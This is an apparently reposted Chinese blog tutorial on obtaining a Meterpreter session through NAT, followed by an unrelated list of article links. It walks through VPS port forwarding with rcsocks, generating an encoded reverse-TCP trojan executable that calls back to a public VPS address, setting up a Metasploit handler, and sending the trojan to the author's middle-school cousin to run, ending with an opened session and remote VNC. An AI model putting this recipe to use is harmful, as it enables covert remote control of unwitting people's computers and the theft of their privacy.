内网穿透获得meterpreter会话
来源:互联网 发布:贝斯谱的软件 编辑:程序博客网 时间:2024/06/03 07:26
背景:我有一台Kali,IP是192.168.1.2。我还有一台VPS,公网IP是45.32.45.32。我在老家读初中的表弟有一台处在内网的电脑。我和表弟的网络都没有公网IP,不存在路由器端口映射的条件。我想给表弟的电脑植入木马,把meterpreter会话反弹给我的kali。
kali:192.168.1.2
VPS:45.32.45.32
表弟的电脑:192.168.2.33
1、在VPS上进行端口转发,可以用 sSocks,lcx,ssh,rinetd 等工具。本例用sSocks演示。
root@K:~# rcsocks -l 7501 -p 7502
侦听两个端口,7501用来接收来自受害者反弹的shell,7502将7501的流量转发出去。
2、回到kali,进入msf控制台,生成一个攻击载荷(payload)
msfconsole -qmsf > use payload/windows/meterpreter/reverse_tcpmsf > payload(reverse_tcp) > set lhost 45.32.45.32lhost => 45.32.45.32 msf > payload(reverse_tcp) > set lport 7501lport => 7501msf > payload(reverse_tcp) > generate -b '\x00\xff' -t exe -e x86/shikata_ga_nai -i 5 -f /root/meter.exe[*] Writing 73802 bytes to /root/meter.exe...
运行这个木马会把meterpreter会话发送到VPS的7501端口。
回到msf主界面,使用接收模块。设置payload
msf > payload(reverse_tcp) > backmsf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/bind_tcppayload => windows/meterpreter/bind_tcpmsf exploit(handler) > set rhost 45.32.45.32rhost => 45.32.45.32msf exploit(handler) > set lport 7502lport => 7502msf exploit(handler) > exploit[*] Started bind handler[*] Sending stage (957999 bytes) to 45.32.45.32[*] Starting the payload handler...
3、将之前制作好的木马发给表弟,让他运行。
[*] Meterpreter session 0 opened (192.168.1.2:34577 -> 45.32.45.32:7502) at 2017-10-6 20:38:22 +0800meterpreter > run vnc
阅读全文
0 0
- 内网穿透获得meterpreter会话
- UDP内网穿透
- 内网穿透
- 内网穿透
- 树莓派穿透内网
- ngrok穿透内网
- 内网穿透
- ngrok内网穿透
- 内网穿透
- 如何穿透内网
- 内网穿透
- 内网穿透教程
- ngrok内网穿透
- FRP内网穿透
- 内网穿透
- SSH 内网穿透
- ngrok 内网穿透
- frp 内网穿透
- Linux system 6
- HDU 5965 扫雷 递推
- Gym
- 动态规划总结
- 九大常用排序
- 内网穿透获得meterpreter会话
- 回文数字生成器
- HDU1078
- Android浏览器— —书签\历史
- 《算-入》第二章
- HTTP头域列表与解释 之 request篇
- 51 nod 1424
- HDU 6005 Pandaland[最小生成树][LCA]
- Struts2 的国际化实现